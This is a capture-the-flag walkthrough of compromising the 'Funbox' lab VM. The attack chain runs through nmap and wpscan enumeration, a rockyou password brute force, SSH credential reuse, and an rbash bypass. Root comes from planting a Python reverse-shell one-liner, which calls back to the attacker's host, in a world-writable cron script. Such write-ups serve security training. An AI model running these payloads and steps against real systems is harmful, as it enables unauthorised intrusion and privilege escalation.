Walkthrough

IP of the target : 192.168.1.13

As usual I started with nmap scan to find open ports and services using the command show below :

nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt 192.168.1.13
Nmap scan report for funbox.lan (192.168.1.13)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      ProFTPD
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  ssl/http Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Funbox – Have fun….
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

Port 21/FTP , 22/SSH , 80/HTTP and 3306/mysql are open, anonymous login is not allowed for FTP so lets move forward on port 80, opening it in browser gives an error "funbox.fritz.boxs server IP address could not be found." So I solved this problem by editing the /etc/hosts file as:

192.168.1.13    funbox.fritz.box                                        
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now I can access the web application and by looking at the theme I was sure that this is "Just another wordpress website", so I started enumeration using wpscan.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $wpscan --url "http://funbox.fritz.box/" --enumerate u,vp
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern 

So I have two usernames, next step is to bruteforce the password against these users using the wordlist rockyou.txt.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $wpscan --url "http://funbox.fritz.box/" --passwords ../../rockyou.txt
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - joe / 12345                                                                                                                               
[SUCCESS] - admin / iubire                                                                                                                            
Trying admin / iubire Time: 00:00:12 <                                                                        > (670 / 14344394)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: joe, Password: 12345
 | Username: admin, Password: iubire

That's it, we found the password of admin user, we can login into admin panel and from there we can pop a reverse shell as user www-data, but wait, here I thought to use these credentials for SSH login and yes I was in as user joe.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ssh joe@192.168.1.13
joe@192.168.1.13's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

umm that's nice , now I started enumerating different directories but I was unable to change directory and cd /home command gives me an error -rbash: cd: restricted and we have many ways to bypass this.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ssh joe@192.168.1.13 -t "bash --noprofile"
joe@192.168.1.13's password: 
joe@funbox:~$ cd /home
joe@funbox:/home$ 

After some enumeration I found interesting file in /home/funny/ directory.

joe@funbox:/home/funny$ ls -al
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
**-rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh**
-rw------- 1 funny funny     1462 Jul 18 10:07 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19 10:43 .cache
-rw-rw-r-- 1 funny funny 48701440 Sep 21 08:42 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
**-rw-rw-r-- 1 funny funny      162 Jun 19 14:13 .reminder.sh**
-rw-rw-r-- 1 funny funny       74 Jun 19 12:25 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19 10:44 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18 10:02 .viminfo
joe@funbox:/home/funny$ cat .reminder.sh 
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

joe@funbox:/home/funny$ 

This message clearly means that .backup.sh is running as user funny, So in the next step I simply edited the .backup.sh file with a reverse shell.

joe@funbox:/home/funny$ cat .backup.sh 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After waiting for some time I got access to funny user's shell, after some more enumeration I couldn't find anything to get root access, So I terminated the current reverse shell and started to listen again on the same port, but this time I got shell of root user.

┌─[m4g1c14n@parrot]─[~]
└──╼ $nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37192
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ exit

Listening again on same port:

┌─[m4g1c14n@parrot]─[~]
└──╼ $nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37194
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

And here is the actual catch of this machine.

NOTE : .backup.sh file is running as cronjob, and after gaining root access , I checked the cronjob for both the users ( funny and root) and found this thing:

This is for user funny:

root@funbox:~# crontab -u funny -l
.
.
.
*/2 * * * * /home/funny/.backup.sh

For user root:

root@funbox:~# crontab -u root -l
.
.
.
*/5 * * * * /home/funny/.backup.sh

So that's the reason I got root shell by listening on the same port after some time . I hope you like the walkthrough :)

NOTE: The awesome artwork used in this article was created by Anton Fritsler.